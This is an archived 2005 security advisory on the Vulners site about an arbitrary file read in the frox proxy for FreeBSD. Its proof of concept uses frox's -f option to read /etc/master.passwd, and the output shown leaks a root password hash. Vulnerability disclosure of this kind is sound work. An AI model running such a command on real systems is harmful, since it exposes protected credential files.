Vulners
Lucene search
froxRead.txt
`=( c1zc0 Security advisory #1 )=
=( Frox transparent froxy / cache )=
=( found by rotor irc.efnet.org #c1zc0 )=
=( http://c1zc0.com - c1zc0 Security 2005 )=
Package: frox
Frox Author: James Hollingshead
Download Site: http://frox.sourceforge.net
Vulnrability: File aribitary read access
Frox is a transparent proxy/cache system for FreeBSD
with the options to be setuid root or be ran as root.
Frox has a security risk which allows any user to read
protected files on the system. This is because of the
way frox handles the loading of configuration files.
The problem exists in the -f option ( which specifies the configuration file):
POC:
q([email protected])
mq(/usr/local/sbin)-> frox -f /etc/master.passwd
Unrecognised option
"root:$2a$04$nR2msaB9.nAgR4qI6pqBNOQbH6LoqALZTmqsqhGEJLLwyTfsxXTd.:0:0::0:0:Charlie"
at line 3 of /etc/master.passwd
Error reading configuration file
lq([email protected])
mq(/usr/local/sbin)->
Vender Has not Been Notified.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Sep 2005 00:00Current
7.4High risk
Vulners AI Score7.4